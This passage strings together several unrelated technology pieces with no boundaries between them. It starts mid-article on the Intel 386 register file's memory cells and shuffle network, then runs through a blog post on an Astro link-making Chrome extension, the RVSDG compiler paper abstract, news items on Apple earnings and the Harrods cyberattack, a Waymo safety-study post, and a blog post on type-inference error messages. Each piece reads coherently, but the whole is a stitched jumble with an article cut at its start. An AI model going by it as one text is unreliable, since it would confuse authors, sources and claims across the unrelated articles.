You can see a "notch" on the left side of the register file
because these registers are half the width of the other registers (16 bits versus 32 bits).
These registers are implemented with the 8T circuit described earlier, making them dual ported:
one register can be read while another register is written.
As described earlier, three vertical bus lines pass through each bit: one bitline for reading and two bitlines
(with opposite polarity)
for writing.
Each register has two control lines (wordlines): one to select a register for reading and another to select a register for writing.
The photo below shows how four cells of type (f) are implemented on the chip.
In this image, the chip's two metal layers have been removed along with most of the polysilicon wiring, showing the underlying silicon.
The dark outlines indicate regions of doped silicon, while the stripes across the doped region correspond to transistor
gates.
I've labeled each transistor with a letter corresponding to the earlier schematic.
Observe that the layout of the bottom half is a mirrored copy of the upper half, saving a bit of space.
The left and right sides are approximately mirrored; the irregular shape allows separate read and write wordlines
to control the left and right halves without colliding.
Four memory cells of type (f), separated by dotted lines. The small irregular squares are remnants of polysilicon
that weren't fully removed.
The 386's register file and datapath are designed with 60 µm of width assigned to each bit.
However, the register circuit above is unusual:
the image above is 60 µm wide but there are two register cells side-by-side.
That is, the circuit crams two bits in 60 µm of width, rather than one.
Thus, this dense layout implements two registers per row (with interleaved bits), providing twice the density of the other register circuits.
If you're curious to know how the transistors above are connected,
the schematic below shows how the physical arrangement of the transistors above corresponds to two of the 8T memory cells
described earlier.
Since the 386 has two overlapping layers of metal, it is very hard to interpret a die photo with the metal layers.
But see my earlier article if you want these photos.
Schematic of two static cells in the 386, labeled "R" and "L" for "right" and "left". The schematic approximately matches the physical layout.
Above the type (f) registers are 10 registers of type (e), occupying five rows of cells.
These registers are the same 8T implementation as before, but these registers are 32 bits wide instead of 16.
Thus, the register takes up the full width of the datapath, unlike the previous registers.
As before, the double-density circuit implements two registers per row.
The silicon layout is identical (apart from being 32 bits wide instead of 16), so I'm not including a photo.
Above those registers are four (d) registers, which are more complex.
They are triple-ported registers, so one register can be written while two other registers are read.
(This is useful for ALU operations, for instance, since two values can be added and the result written back
at the same time.)
To support reading a second register, another vertical bus line is added for each bit.
Each cell has two more transistors to connect the cell to the new bitline.
Another wordline controls the additional read path.
Since each cell has two more transistors, there are 10 transistors in total and the circuit is called 10T.
Four cells of type (d). The striped green regions are the remnants of oxide layers that weren't completely removed, and can be ignored.
The diagram above shows four memory cells of type (d).
Each of these cells takes the full 60 µm of width, unlike the previous double-density cells.
The cells are mirrored horizontally and vertically;
this increases the density slightly since power lines can be shared between cells.
I've labeled the transistors A through H as before, as well as the two additional transistors I and J for the second read line.
The circuit is the same as before, except for the two additional transistors, but
the silicon layout is significantly different.
Each of the (d) registers has five control lines. Two control lines select a register for reading, connecting the register
to one of the two vertical read buses.
The three write lines allow parts of the register to be written independently: the top 16 bits, the next 8 bits, or the
bottom 8 bits.
This is required by the x86 architecture, where a 32-bit register such as EAX can also be accessed as the 16-bit AX register,
the 8-bit AH register, or the 8-bit AL register.
Note that reading part of a register doesn't require separate control lines: the register provides all 32 bits and
the reading circuit can ignore the bits it doesn't want.
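The effect of these write wordlines can be sketched in C (a behavioral model of my own, not the actual circuit): each wordline enables writes to one slice of the 32-bit row, and combinations of wordlines implement the different access sizes.

#include <stdint.h>

/* Toy model of the three write wordlines of a type (d) register.
   Each mask corresponds to the slice that one wordline enables. */
#define WL_LOW8   0x000000FFu   /* bottom 8 bits, e.g. AL */
#define WL_HIGH8  0x0000FF00u   /* next 8 bits, e.g. AH   */
#define WL_TOP16  0xFFFF0000u   /* upper 16 bits          */

/* Assert any combination of wordlines: an 8-bit AL write asserts
   WL_LOW8, a 16-bit AX write asserts WL_LOW8 | WL_HIGH8, and a
   full 32-bit EAX write asserts all three. */
uint32_t reg_write(uint32_t reg, uint32_t wordlines, uint32_t val) {
    return (reg & ~wordlines) | (val & wordlines);
}

Reads need no such masking, matching the point above: the register always provides all 32 bits, and the reader ignores the bits it doesn't want.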
Proceeding upward, the three (c) registers have a similar 10T implementation.
These registers, however, do not support partial writes, so all 32 bits must be written at once.
As a result, these registers only require three control lines (two for reads and one for writes).
With fewer control lines, the cells can be fit into less vertical space, so the layout is slightly more compact than the previous type (d) cells. The diagram below shows four type (c) rows above two type (d) rows.
Although the cells have the same ten transistors, they have been shifted around somewhat.
Four rows of type (c) above two cells of type (d).
Next are the four (b) registers, which support 16-bit writes and 32-bit writes (but not 8-bit writes).
Thus, these registers have four control lines (two for reads and two for writes).
The cells take slightly more vertical space than the (c) cells due to the additional control line, but the layout is almost identical.
Finally, the (a) register at the top has an unusual feature: it can receive a copy of the value in the register just below it.
This value is copied directly between the registers, without using the read or write buses.
This register has 3 control lines: one for read, one for write, and one for copying.
A cell of type (a), which can copy the value in the cell of type (b) below.
The diagram above shows a cell of type (a) above a cell of type (b). The cell of type (a) is based on the standard 8T circuit,
but with six additional transistors to copy the value of the cell below.
Specifically, two inverters buffer the output from cell (b), one inverter for each side of the cell.
These inverters are implemented with transistors I1 through I4.[5]
Two transistors, S1 and S2, act as pass-transistor switches between these inverters and the memory cell.
When activated by the control line, the switch transistors allow the inverters to overwrite the memory cell with
the contents of the cell below.
Note that cell (a) takes considerably more vertical space because of the extra transistors.
Speculation on the physical layout of the registers
I haven't determined the mapping between the 386's registers and the 30 physical registers, but I can speculate.
First, the 386 has four registers that can be accessed as 8, 16, or 32-bit registers: EAX, EBX, ECX, and EDX.
These must map onto the (d) registers, which support these access patterns.
The four index registers (ESP, EBP, ESI, and EDI) can be used as 32-bit registers or 16-bit registers,
matching the four (b) registers with the same properties.
Which one of these registers can be copied to the type (a) register?
Maybe the stack pointer (ESP) is copied as part of interrupt handling.
The register file has eight 16-bit registers, type (f).
Since there are six 16-bit segment registers in the 386, I suspect the 16-bit registers are the segment registers and two additional registers.
The LOADALL instruction gives some clues, suggesting that the two additional 16-bit registers are LDT (Local Descriptor Table register) and TR (Task Register).
Moreover, LOADALL handles 10 temporary registers, matching the 10 registers of type (e) near the bottom of the register file.
The three 32-bit registers of type (c) may be the CR0 control register and the DR6 and DR7 debug registers.
The six 16-bit segment registers in the 386.
In this article, I'm only looking at the main register file in the datapath.
The 386 presumably has other registers scattered around
the chip for various purposes.
For instance, the Segment Descriptor Cache contains multiple registers similar to type (e), probably holding cache entries.
The processor status flags and the instruction pointer (EIP) may not be implemented as discrete registers.[6]
To the right of the register file, a complicated block of circuitry uses seven-bit values to select registers.
Two values select the registers (or constants) to read, while a third value selects the register to write.
I'm currently analyzing this circuitry, which should provide more insight into how the physical registers
are assigned.
The shuffle network
There's one additional complication in the register layout.
As mentioned earlier, the bottom 16 bits of the main registers can be treated as two 8-bit registers.[7]
For example, the 8-bit AH and AL registers form the bottom 16 bits of the EAX register.
I explained earlier how the registers use multiple write control lines to allow these different parts of the register
to be updated separately.
However, there is also a layout problem.
To see the problem, suppose you perform an 8-bit ALU operation on the AH register, which is bits 15-8 of the EAX register.
These bits must be shifted down to positions 7-0 so they can take part in the ALU operation, and then must be shifted
back to positions 15-8 when stored into AH.
On the other hand, if you perform an ALU operation on AL (bits 7-0 of EAX), the bits are already in position and
don't need to be shifted.
To support the shifting required for 8-bit register operations, the 386's register file physically interleaves the bits of the two lower bytes (but not the high bytes).
As a result, bit 0 of AL is next to bit 0 of AH in the register file, and so forth.
This allows multiplexers to easily select bits from AH or AL as needed.
In other words, each bit of AH and AL is in almost the correct physical position, so an 8-bit shift is not required.
(If the bits were in order, each multiplexer would need to be connected to bits that are separated by eight positions,
requiring inconvenient wiring.)[8]
The shuffle network above the register file interleaves the bottom 16 bits.
The photo above shows the shuffle network.
Each bit has three bus lines associated with it: two for reads and one for writes, and these all get shuffled.
On the left, the lines for the 16 bits pass straight through.
On the right, though, the two bytes are interleaved.
This shuffle network is located below the ALU and above the register file, so data words are shuffled when stored in the
register file and then unshuffled when read from the register file.[9]
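The interleaving can be expressed as a mapping from logical bit positions to physical columns. The sketch below is my reconstruction of the idea (the exact column order on the die may differ): AL and AH bits of equal weight land in adjacent columns, so choosing between them is a 2:1 multiplexer decision per bit rather than an 8-position shift.

#include <stdio.h>

/* Map a logical register bit (0-31) to a physical column, with the
   low two bytes interleaved: AL bit 0, AH bit 0, AL bit 1, AH bit 1, ... */
int column_of(int bit) {
    if (bit >= 16)
        return bit;                   /* upper 16 bits stored in order */
    return (bit % 8) * 2 + (bit / 8); /* AL bits in even columns, AH in odd */
}

int main(void) {
    for (int bit = 0; bit < 16; bit++)
        printf("logical bit %2d -> column %2d\n", bit, column_of(bit));
    return 0;
}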
In the photo, the lines on the left aren't quite straight.
The reason is that the circuitry above is narrower than the circuitry below.
For the most part, each functional block in the datapath is constructed with the same width (60 µm) for each bit.
This makes the layout simpler since functional blocks can be stacked on top of each other and the vertical bus wiring
can pass straight through.
However, the circuitry above the registers (for the barrel shifter) is about 10% narrower (54.5 µm), so the wiring
needs to squeeze in and then expand back out.[10]
There's a tradeoff of requiring more space for this wiring versus the space saved by making the barrel shifter
narrower and Intel must have considered the tradeoff worthwhile.
(My hypothesis is that since the shuffle network required additional wiring to shuffle the bits, it didn't take up
more space to squeeze the wiring together at the same time.)
Conclusions
If you look in a book on processor design, you'll find a description of how registers can be created from static memory cells.
However, the 386 illustrates that the implementation in a real processor is considerably more complicated.
Instead of using one circuit, Intel used six different circuits for the registers in the 386.
The 386's register circuitry also shows the curse of backward compatibility.
The x86 architecture supports 8-bit register accesses for
compatibility with processors dating back to 1971.
This compatibility requires additional circuitry such as the shuffle network and interleaved registers.
Looking at the circuitry of x86 processors makes me appreciate some of the advantages of RISC processors,
which avoid much of the ad hoc circuitry of x86 processors.
If you want more information about how the 386's memory cells were implemented, I wrote a lower-level article earlier.
I plan to write more about the 386, so follow me on Bluesky (@righto.com) or RSS for updates.
Footnotes and references
Astro Linker Chrome Extension - A Fun Personal Project
A little Chrome extension for my own personal use. It helps make creating links on my site a bit easier.
The Problem
This site is built using Astro, and I’ve become a huge fan. I recently added a new feature that lets me add Links, which are just links to other websites that I’ve found useful for one reason or another. The idea and implementation are working well, but I’ve encountered an issue in actually using the feature because it’s just kind of a pain to have to create the file.
The current process is:
Grab the URL of the page.
Create a new file in the src/content/links directory.
Add the frontmatter to the file. I end up needing to copy/paste the URL, the title, and sometimes the description.
Commit the file, push to GitHub, and wait for the site to update.
It’s not that bad, but steps two through four all aren’t that good either.
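For reference, a link file presumably holds a little frontmatter along these lines; the field names here are my guess at a typical Astro content collection, not the site's actual schema:

---
title: "Some Useful Page"
url: "https://example.com/some-useful-page"
description: "Why I found this page worth sharing."
tags: ["astro", "tooling"]
date: 2025-05-01
---

Copying the URL, title, and description into a file like this by hand is the tedious part that a browser extension can automate.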
The Solution
I’ve recently been building a Chrome extension at SBLive to help enhance the CMS experience for our journalists and editors. The approach there was driven by the fact that our own team could quickly iterate on experimental features without having to wait for the development cycle of the CMS itself.
Taking that experience, I realized it should be pretty easy to create a Chrome extension that would allow me to quickly create links on my site. I should be able to
just click a button and have the extension fill in the URL, title, and description for me.
The Code
I’m not sure how I feel about the term, but I vibe coded this one. It’s short, simple, and not half bad. You can see the GitHub repo:
It’s using TypeScript and TailwindCSS, which is definitely overkill but it makes me happy and that’s kinda the point, right? The process of creating a link
is now as easy as:
Click the button.
Maybe add tags, maybe update the title or description.
Click the save button.
Commit the file, push to GitHub, and wait for the site to update.
What’s Next?
It’s fresh and new, so I’m sure there are some rough edges that I haven’t noticed yet. The main feature that’s obviously lacking is the fact that I’ve still
got to go make a git commit and push the new link up to GitHub. It’d be great if I could just save the file directly from the extension. I’ve got a few
ideas on how to make that happen, maybe via a GitHub Action that I trigger on save?
I’ll noodle on that for a bit while I use it and see how it feels.
Dorky Takeaway
It’s very fun and refreshing to build something that’s so simple and useful to me. Something I’ll use all for myself.
Vibe coding using Cursor is a lot of fun.
RVSDG: An Intermediate Representation for Optimizing Compilers (2019)
Abstract:
Intermediate Representations (IRs) are central to optimizing compilers as the way the program is represented may enhance or limit analyses and transformations. Suitable IRs focus on exposing the most relevant information and establish invariants that different compiler passes can rely on. While control-flow centric IRs appear to be a natural fit for imperative programming languages, analyses required by compilers have increasingly shifted to understand data dependencies and work at multiple abstraction layers at the same time. This is partially evidenced in recent developments such as the MLIR proposed by Google. However, rigorous use of data flow centric IRs in general purpose compilers has not been evaluated for feasibility and usability as previous works provide no practical implementations. We present the Regionalized Value State Dependence Graph (RVSDG) IR for optimizing compilers. The RVSDG is a data flow centric IR where nodes represent computations, edges represent computational dependencies, and regions capture the hierarchical structure of programs. It represents programs in demand-dependence form, implicitly supports structured control flow, and models entire programs within a single IR. We provide a complete specification of the RVSDG, construction and destruction methods, as well as exemplify its utility by presenting Dead Node and Common Node Elimination optimizations. We implemented a prototype compiler and evaluate it in terms of performance, code size, compilation time, and representational overhead. Our results indicate that the RVSDG can serve as a competitive IR in optimizing compilers while reducing complexity.
Submission history
From: Nico Reissmann [view email]
[v1] Tue, 10 Dec 2019 22:43:19 UTC (312 KB)
[v2] Tue, 17 Mar 2020 22:27:27 UTC (304 KB)
Apple to report quarterly earnings amid Trump trade policy chaos
Guardian
www.theguardian.com
2025-05-01 20:00:46
Trump said consumer electronics will be exempted from his soaring tariffs on China but it is unclear for how long Investors have their eyes on Apple as it prepares to report financial results of the second quarter of the fiscal year on Thursday. The tech giant has been working to calm nervous analys...
Investors have their eyes on Apple as it prepares to report financial results of the second quarter of the fiscal year on Thursday. The tech giant has been working to calm nervous analysts after Donald Trump levied sweeping tariffs on countries around the world that are likely to complicate supply chains for consumer electronics. Since the beginning of the year, Apple’s stock has slumped 16%.
In anticipation of its earnings report, the company’s stock notched up slightly on Wednesday. Analysts are predicting a positive quarter for Apple, with an average revenue estimate of $94.56bn, up 4.2% over last year, and earnings of $1.62 per share, up 5.8%. The company, worth $3.2tn, has beaten Wall Street’s expectations for the previous four quarters.
The iPhone maker is heavily reliant on Chinese manufacturing for its phones, tablets and laptops. Days after Trump instituted soaring tariffs on China, at one point as high as 245%, the president said he would make an exception for consumer electronics.
Apple’s CEO, Tim Cook, spoke to senior White House officials around this time, according to the Washington Post. It was after these conversations that Trump announced his exception for consumer electronics. Apple’s stock rose 7% in the days after the announcement.
However, it is unclear how lasting the reprieve may be. Howard Lutnick, the US commerce secretary, has called the exemption “temporary”, and even Trump later said on social media that there’s been no “exception”.
The president has repeatedly said he wants to see more manufacturing in the US. In February, he met with Cook to discuss investing in US manufacturing. “He’s going to start building,” Trump said after the meeting. “Very big numbers – you have to speak to him. I assume they’re going to announce it at some point.”
JP Morgan estimates costs would skyrocket for Apple if it moves production to the US, saying in a note this week that it could “drive a 30% price increase in the near-term, assuming a 20% tariff on China”. JP Morgan and other analysts have said Apple could continue to move more of its manufacturing to India, which only faces a 10% tariff.
Apple chartered jets to airlift some $2bn worth of iPhones from India to the US earlier this month to boost inventory in anticipation of price hikes from Trump’s tariffs and panic-buying by worried consumers. This comes as investors have expressed concern about decreasing iPhone sales in China, the world’s biggest smartphone market. During its last earnings report in January, Apple reported that iPhone sales fell by 11.1% in China in the first quarter and missed Wall Street’s expectations for iPhone revenue.
In the short term, however, analysts say the tariff confusion could benefit Apple, with people panic-buying its products in fear that prices will rise.
“What remains to be seen in the longer term is how much of any increased cost will be passed on to consumers,” said Dipanjan Chatterjee, principal analyst for Forrester. “And if [consumers] will absorb these price increases without pulling back on demand for Apple products.”
New Study: Waymo is reducing serious crashes and making streets safer
The path to Vision Zero requires reducing severe crashes and improving the safety of those most at risk. Our latest research paper shows that the Waymo Driver is making significant strides in both areas. By reducing the most dangerous crashes and providing better protection for pedestrians, cyclists, and other vulnerable road users, Waymo is making streets safer in cities where it operates.
The paper, accepted for publication in the journal Traffic Injury Prevention, expands on our Safety Impact Hub research, providing a deeper analysis of Waymo’s performance across 11 different crash types compared to human drivers. It also offers new insights into Waymo’s positive impact on serious injury crash rates.
Types of crashes used for the Waymo Driver and human benchmark comparisons
The research finds that, compared to human benchmarks over 56.7 million miles and regardless of who was at fault, the Waymo Driver had:
Safer interactions with vulnerable road users (VRUs), with substantial reductions in crashes involving injuries among pedestrians (92% reduction), cyclists (82% reduction), and motorcyclists (82% reduction).
96% fewer injury-involving intersection crashes, which, according to NHTSA, are a leading cause of severe road harm for human drivers. This reduction can be largely attributed to the Waymo Driver’s ability to detect and appropriately respond to vehicles running a red light.
85% fewer crashes with suspected serious or worse injuries. Building on our previous research, which demonstrated Waymo’s significant reductions across all injuries combined, the new study provides early evidence for similar benefits in serious injuries alone. The results are statistically significant, but because serious injury cases are, fortunately, rare, they’re based on a small number of events. We will continue to monitor outcomes and gain greater confidence as we accumulate more miles.
These findings add to the growing body of data showing that the Waymo Driver is reducing the most dangerous crash types, contributing to safer roadways, and pushing forward a vision of zero traffic deaths and serious injuries on our roads. While this particular research did not account for crash contribution, a previous study led by the insurance company Swiss Re demonstrated that the Waymo Driver’s positive impact is even more significant when contribution is taken into account.
“It’s exciting to see the real positive impact that Waymo is making on the streets of America as we continue to expand,” said Mauricio Peña, Waymo’s Chief Safety Officer. “This research reinforces the growing evidence that the Waymo Driver is playing a crucial role in reducing serious crashes and protecting all road users.”
“It’s encouraging to see real-world data showing Waymo outperforming human drivers when it comes to safety. Fewer crashes and fewer injuries — especially for people walking and biking — is exactly the kind of progress we want to see from autonomous vehicles,” said Jonathan Adkins, Chief Executive Officer of the Governors Highway Safety Association.
As Waymo increases in scale, we look forward to strengthening our safety data, assessing the long-term impact on road safety, and helping to advance conversations amongst researchers, policymakers, and safety groups.
We look forward to continuing this conversation and working toward a future where serious traffic injuries, one of the biggest causes of death in the U.S., are dramatically reduced. For those interested in a deeper dive into the data and methodology, we encourage you to explore the full study and our rolling safety data hub.
Harrods the next UK retailer targeted in a cyberattack
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 19:33:25
London's iconic department store, Harrods, has confirmed it was targeted in a cyberattack, becoming the third major UK retailer to report cyberattacks in a week following incidents at M&S and the Co-op. [...]...
London's iconic department store, Harrods, has confirmed it was targeted in a cyberattack, becoming the third major UK retailer to report cyberattacks in a week following incidents at M&S and the Co-op.
In a statement shared with BleepingComputer, Harrods says threat actors recently attempted to hack into their systems, causing the company to restrict access to sites.
"We recently experienced attempts to gain unauthorised access to some of our systems," Harrods told BleepingComputer.
"Our seasoned IT security team immediately took proactive steps to keep systems safe and as a result we have restricted internet access at our sites today."
"Currently all sites including our Knightsbridge store, H beauty stores and airport stores remain open to welcome customers. Customers can also continue to shop via harrods.com."
"We are not asking our customers to do anything differently at this point and we will continue to provide updates as necessary."
Harrods has not shared any further details in response to BleepingComputer's questions, such as whether systems were breached or if data was stolen.
However, the decision to restrict access to some platforms indicates that they are actively responding to the attack.
This incident follows shortly after two other prominent UK retailers, Marks and Spencer and Co-op, disclosed cyberattacks.
BleepingComputer later confirmed the M&S attack was linked to threat actors associated with "Scattered Spider" tactics, who deployed the DragonForce ransomware on the company's network.
Yesterday, Co-op also disclosed a cyber incident, stating they experienced attempts to hack into their network.
However, an internal email sent by Chief Digital and Information Officer Rob Elsey and seen by ITV News indicates the breach is larger than initially stated, telling employees that VPN access was disabled and urging staff to be vigilant when using email and Microsoft Teams.
"When running a Microsoft Teams call, please ensure all attendees are as expected and that users are on camera," reads a portion of the email.
"Don't post sensitive information in the Teams chat function such as colleague, client, customer or member related data."
Law enforcement has not released an official advisory related to these attacks, but as M&S and Co-op are both believed to have started with social engineering attacks, we will likely see a bulletin released shortly.
Designing type inference for high quality type errors
Type inference has a reputation for causing unhelpful error messages from the compiler when there is a type error. For example, here’s a typical comment:
However, things don’t have to be this way. Type inference’s bad reputation is due to design decisions in existing languages that sacrifice good error messages in exchange for other goals. There is nothing inherent to type inference that prevents you from offering good error messages.
I recently released PolySubML, a programming language combining global type inference with subtyping and advanced polymorphism, and supporting good type error messages was a constant consideration during development. In this post, I will explain how I designed PolySubML's error messages and why I think existing languages tend to fall short in this respect.
But first, a few disclaimers:
First off, this post is solely concerned with error messages for type errors. Dealing with syntax errors, particularly parser errors, is a completely different topic that is outside the scope of this post.
Second, the focus here is helping the user to understand why their code won't compile and identify the cause of the error. In some cases, compilers will also attempt to guess what the user meant and suggest a fix, but this is inherently heuristic-based and subjective, and outside the scope of this post.
Lastly, PolySubML is an experimental hobby programming language that has never been used at large scale. It is a proof of concept and demonstration of my ideas, but it is a very different sort of beast than widespread battle-tested languages. Since PolySubML is a one-person hobby project, the focus is on the underlying algorithms and design aspects, rather than aspects like polish, which are a function of time and people (the Rust compiler in particular has had almost infinite polish applied over the years, thanks to its incredibly large and dedicated community).
With that out of the way, let’s get on to the pitfalls that often make compiler error messages suck:
Rule 1: Never guess or backtrack
Generally speaking, users think their code is correct when submitting it to the compiler. Sometimes, people will speculatively compile to try to identify bugs or places that need to be updated during a refactor, but even then, the user merely thinks that there might be bugs somewhere in the abstract. They won't be convinced of the presence of bugs unless the compiler provides specific evidence explaining where and why there is a bug. (Or rather, a violation of the language's typing rules, which often but not necessarily indicates a bug.)
The job of a compiler error message is to prove to the user that their code is invalid according to the language's rules, ideally in a way that helps the user identify where they went wrong and how the problem can be corrected.
Abstractly, the process of type checking can be modeled as deriving a set of facts about the code, with specific rules for deriving new facts based on previous facts, with the rules determined by the language. For example, you might have reasoning along the lines of "4 has type int" and "if 4 has type int, then after let x = 4, x also has type int" and "in x.foo, x is required to be a record", and "if an expression of type int is used as a record, the program is invalid".
The general form of the rules is "if A and B and C, then D", where the typechecker continually derives facts from the right hand side of rules once the left hand side is satisfied. Eventually it either derives a contradiction and reports a type error, or it doesn't and the code compiles successfully. This leads to proofs that are relatively short and easy to understand - once a contradiction is reached, you can easily work backwards and show the user a sequence explaining exactly why their code is invalid, step by step. (Realistically, you probably don't want to show the user every step for reasons of verbosity, but the point is that you could if necessary. More on this in section 3.)
However, this all goes wrong if your language includes rules of the form "if A and B and C, then D or E". Suddenly, instead of proceeding monotonically from start to finish, the compiler has to guess how to proceed. This means that the compiler has to try every possibility in order to discover a type error. For example, if you know A, B, and C, that lets you conclude "D or E", but "D or E" doesn't help at all by itself. If, say, D turns out to lead to a contradiction, you can't immediately report an error like before - instead you have to backtrack and see if E leads to a contradiction too.
Ad-hoc overloading
The above description is very abstract, so let's look at a more concrete example - specifically ad hoc overloading. In some languages, you might have multiple different functions with the same name and different type signatures, and the compiler needs to try each one in turn and can only report a type error if every single possible choice results in an error.
For example, in Java, you might have something like
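Here's a representative sketch, with A, B, and C as placeholder classes (the bodies don't matter, only the signatures):

// Sketch of ad-hoc overloading: three overloads of foo with distinct
// parameter types.
class A {}
class B {}
class C {}

class Example {
    static void foo(A a) { /* ... */ }
    static void foo(B b) { /* ... */ }
    static void foo(C c) { /* ... */ }
}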
Where A, B, and C are distinct types. In order to type check foo(v), the compiler has to try all three possible foo functions to see if any of them typecheck. If v has type C, then it will first try A, find a type error, backtrack and try B, find a type error, backtrack again and try C, and finally find a valid match. If v instead had some other type, say D, then the typechecker would have to try all three functions before it could prove there is a type error.
So why is this so bad? Having to guess and backtrack will make typechecking very slow, but it also makes compiler error messages terrible.
Without guessing, error messages are simple and easy because there is a direct chain of reasoning leading to a contradiction. However, when the typechecker has to make guesses like with the overloading example, that all goes out the window.
In order to prove to the user that foo(v) has a type error, the compiler has to prove that v does not have type A (with some chain of reasoning) and prove that v does not have type B (with another chain of reasoning) and also prove that v does not have type C. Suddenly, the proof of an error is three times as long. But worse yet, this is completely useless to the user.
The user doesn't care about every possibility. The user intended to call some specific function foo, not every possible function. Perhaps they intended for v to have type B and made a mistake. (Or perhaps v having type D is correct but they mistakenly thought that there is a version of foo which takes D as argument.)
If the user intended v to have type B, then what they care about is the proof that v does not have type B (so they can figure out what the mistake was and correct it). They don't care at all that the compiler also checked the hypothetical possibilities of A and C and found that those don't work either, since they never intended for that to be the case in the first place!
If you force the typechecker to make guesses, it will guess things the user didn’t intend, and the resulting error messages will be bloated and irrelevant to the user.
Going exponential
From the previous example, you might agree that overloading is bad, but not that bad. After all, checking the type of the argument should be trivial in this case since the types involved are so simple (assuming no inheritance or anything, at least). However, this was the simplest possible case, for the sake of example. Overloading gets worse. Much worse.
For example, languages usually do not force users to annotate a type on literally every expression in the program, which means that oftentimes the type of something is temporarily unknown and has to be inferred. Instead of just checking the known type of v against A, B, and C and immediately detecting a contradiction, you might have to go through a whole chain of inference to rule out each case.
Even worse than that, functions often have multiple arguments, and so guessing which overload to use also influences what types every other argument to the function is expected to take. That means that the guess cascades: for each guess of the first argument, you have to independently check the other arguments, which may in turn involve yet more guesses and backtracking. Likewise, checking the type of an argument may be nontrivial when the type is generic, and so checking a guess for the top level type requires recursion to check the type parameters, which in turn involves more guesses.
This means that such guessing will often blow up exponentially. For every top level guess, you have to try every possibility at the second level decision point, and for each of those, you have to try every possibility at the third level decision point, etc.
Even worse is C++, where the template system runs on the principle of "substitution failure is not an error", which roughly means "try every possibility and only report an error if every single combination of choices leads to a failure". This means that usage of templates often results in a) exponential increases in compilation time and b) exponentially large compile error messages. Even worse, abuse of this "feature" became standard practice in the C++ community (referred to as "template metaprogramming"). C++ is legendary for being slow to compile and having massive, completely incomprehensible error messages, and this is a major reason why.
Therefore, the first and most important step to ensure good error messages is to design your type system so the typechecker never has to guess or backtrack.
Rule 2: Don’t jump to conclusions
The first rule merely afflicts most real-world programming languages. Now it's time to get really controversial with something that nearly every language gets wrong.
Consider the following Ocaml code:
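let _ = [1; ""]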
Compiling this results in an error message:
File "bin/main.ml", line 1, characters 12-14:
1 | let _ = [1; ""]
^^
Error: This expression has type string but an expression was expected of type
int
This error message tells us that "" has type string, which is good, but it also claims that it was expected to have type int for no apparent reason, which is less good. There is nothing inherent about lists in Ocaml that requires them to be ints. Something like [""; ""] would compile just fine. The actual cause of the conflict is something that Ocaml didn't highlight at all - the 1 next to the highlighted portion.
Now in this case, the example is small enough that the user could probably deduce the actual cause of the mismatch just by looking at the code near the point of the error. However, as the code becomes bigger and more complex, that quickly becomes impossible. For example, consider the following:
type 'a ref = {mutable v: 'a}
let v = {v = `None}
(* Fake identity function which secretly stores the value in shared mutable state *)
let f = fun x -> (
    match v.v with
    | `None -> let _ = v.v <- `Some x in x
    | `Some old -> let _ = v.v <- `Some x in old
)
(* assume lots of code in between here *)
(* blah blah blah *)
let _ = 1 + f 1
(* assume lots of code in between here *)
(* blah blah blah *)
let _ = 5.3 -. f 2.1
This produces the following, rather unhelpful error message:
File "bin/main.ml", line 19, characters 17-20:
19 | let _ = 5.3 -. f 2.1
^^^
Error: This expression has type float but an expression was expected of type
int
That’s it, the entire compiler output. Again, we can see that the highlighted expression is a float, but there’s absolutely no indication of why Ocaml expected it to be an int instead.
Unlike the previous example, looking at the surrounding code won't make it any clearer either. Even looking at the definition of the f function being called nearby doesn't help, as f doesn't have an explicit type signature. The actual cause of the mismatch is a different call to f in a different part of the code, with no indication of how to find it.
The fundamental problem here is that when Ocaml requires two types to be equal, it doesn't actually keep track of the types that it expected to be equal. It just blindly assumes that whichever type it happens to see first is the gospel truth and proceeds under that assumption. Doing it this way does make typechecking slightly faster (due to having to track less data), which is presumably why the Ocaml compiler is implemented this way. However, the result is completely unhelpful error messages.
If the user writes [1; ""], then maybe they intended it to be a list of ints and the "" is incorrect. But it could also be the case that they intended to have a list of strings and the 1 is the incorrect part. (Or possibly, the user was just not aware that Ocaml forbids having both ints and strings in the same list, and will be left confused either way as long as the error message doesn't explain this restriction.)
So what would a better error message look like? Let’s look at how PolySubML handles the same example. The code isn’t quite directly comparable because PolySubML doesn’t force type equality like this in the first place, but in this particular example, the end result is still the same, so it still offers a useful comparison.
Here’s the same code from before, translated to PolySubML:
let v = {mut v = `None 0};
(* Fake identity function which secretly stores the value in shared mutable state *)
let f = fun x -> (
    match v.v <- `Some x with
    | `None _ -> x
    | `Some old -> old
);
(* assume lots of code in between here *)
(* blah blah blah *)
let _ = 1 + f 1;
(* assume lots of code in between here *)
(* blah blah blah *)
let _ = 5.3 -. f 2.1;
And here’s what the PolySubML compiler outputs:
TypeError: Value is required to have type float here:
(* blah blah blah *)
let _ = 5.3 -. f 2.1;
^~~~~~~~
However, that value may have type int originating here:
(* blah blah blah *)
let _ = 1 + f 1;
^
(* assume lots of code in between here *)
Hint: To narrow down the cause of the type mismatch, consider adding an explicit type annotation here:
match v.v <- `Some x with
| `None _ -> x
| `Some (old: _) -> old
+ ++++
);
Notice how PolySubML shows both sides of the conflict: where a value of type int originates and then flows to a place where type float is required. Not only that, but the error message also suggests a place to add a manual type annotation to help narrow down the cause of the mistake. This brings us to the next rule, a technique I came up with for PolySubML which, as far as I know, has not been done before.
Rule 3: Ask the user to clarify intent
In my previous language, CubiML, type error messages show where a) a value originates with a certain type and then b) flows to a use where it is required to have an incompatible type. For simple cases, this is already enough for the user to understand the problem. However, thanks to type inference, there might be an arbitrarily long and complex path from a) to b) which the user won't understand. For example, in the previous section, the int flows into a function call, through a mutable field, a match expression, and then back out of the function to a different call of the same function.
As described in the previous sections, there is a chain of inference starting from the provided source code and the language's rules which leads to a contradiction. However, the compiler doesn't know which part of that chain contains the problem. The user's mistake could be at any point in that chain.
One approach would be to show the user the entire chain of reasoning leading to the contradiction. That would certainly ensure that the part with the true mistake is also shown. However, long error messages are useless because the user won’t be able to actually hunt through the lengthy output to find the one part that’s actually relevant to them. Therefore, we need to keep error messages relatively short, which seems like an impossible contradiction.
Fortunately, there's another possibility - ask the user for clarification to narrow down the location of their mistake. Instead of presenting the entire chain to the user, just ask for the ground truth at one point in the chain, which will in turn rule out one half and allow you to progressively narrow down the location of the mistake.
For example, look at the last part of the PolySubML error message shown in the previous section:
Hint: To narrow down the cause of the type mismatch, consider adding an explicit type annotation here:
match v.v <- `Some x with
| `None _ -> x
| `Some (old: _) -> old
+ ++++
);
In the case of a type error, PolySubML makes a list of every inference variable involved in the conflicting chain, and then picks one (usually near the middle) and suggests that the user add an explicit type annotation for it.
